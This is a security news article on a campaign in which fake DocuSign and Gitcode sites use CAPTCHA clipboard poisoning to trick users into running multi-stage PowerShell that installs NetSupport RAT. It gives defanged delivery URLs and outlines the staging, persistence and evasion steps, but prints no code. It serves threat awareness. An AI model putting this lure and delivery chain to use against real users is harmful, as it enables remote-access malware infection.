Distribution of NetSupport RAT through Multifaceted PowerShell Attack on Counterfeit DocuSign and Gitcode Websites

Threat hunters have identified a recent campaign utilizing deceptive websites to lure unsuspecting users into executing malicious PowerShell scripts, ultimately infecting their systems with the NetSupport RAT malware.

The DomainTools Investigations (DTI) team reported detection of “malicious multi-stage downloader PowerShell scripts” hosted on fraudulent websites posing as Gitcode and DocuSign.

The sites aim to mislead users into copying and executing an initial PowerShell script within the Windows Run command. This execution initiates a sequence where the initial script downloads a secondary downloader script, which further retrieves additional payloads, culminating in the installation of NetSupport RAT on the compromised systems.

It is suspected that these counterfeit sites proliferate through social engineering tactics via email or social media platforms.

The PowerShell scripts hosted on the fake Gitcode sites are crafted to download successive intermediate scripts from an external server. These scripts work in tandem to launch the NetSupport RAT on victim machines.

DomainTools also detected multiple sites impersonating DocuSign, such as docusign.sa[.]com, to deploy the same remote access trojan, albeit with an additional layer: employing ClickFix-style CAPTCHA verifications to manipulate victims into executing the malicious PowerShell script.

Similar to recent cases involving EDDIESTEALER infostealer attacks, users arriving at these pages are prompted to complete a CAPTCHA verification to prove they are not bots.

Interacting with the CAPTCHA results in an obfuscated PowerShell command being secretly copied to the user’s clipboard, a technique known as clipboard poisoning. Users are then directed to open the Windows Run dialog, paste the command, and execute it.

This PowerShell script is designed to download a persistence script to ensure the payload launches automatically upon user login.

Though the payload was inaccessible during the investigation, it is expected to interact with the delivery site at docusign.sa[.]com/verification/c.php, subsequently refreshing the browser to display content from docusign.sa[.]com/verification/s.php?an=1.

This process triggers the delivery of a second-stage PowerShell script, which then downloads and executes a third-stage ZIP payload from the same server while modifying the URL parameter. The final script unpacks the archive and executes an executable named “jp2launcher.exe,” facilitating the deployment of the NetSupport RAT.

The multi-layered approach of scripts that perpetuate further downloads and executions is likely aimed at circumventing detection and enhancing resilience against security investigations.

The exact actors behind this campaign remain unidentified; however, DomainTools highlighted similarities in the delivery URLs, domain naming, and registration patterns with a previously detected SocGholish (FakeUpdates) campaign from October 2024.

It is important to note that the techniques employed are widely recognized, and NetSupport Manager is a legitimate administration tool often misused by various threat groups such as FIN7, Scarlet Goldfinch, Storm-0408, among others.